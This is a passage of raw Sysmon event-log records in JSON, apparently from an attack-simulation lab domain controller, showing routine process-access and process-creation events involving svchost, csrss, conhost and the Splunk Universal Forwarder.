C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010B3870500}","TargetProcessId":"4948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.700\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-001074880500}\r\nProcessId: 5068\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nParentProcessId: 4948\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.700","ProcessGuid":"{41C8662E-1FF6-5F25-0000-001074880500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF6-5F25-0000-0010B3870500}","ParentProcessId":"4948","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nSourceProcessId: 4948\r\nSourceThreadId: 4944\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001074880500}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-0010B3870500}","SourceProcessId":"4948","SourceThreadId":"4944","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001074880500}","TargetProcessId":"5068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001074880500}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001074880500}","TargetProcessId":"5068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 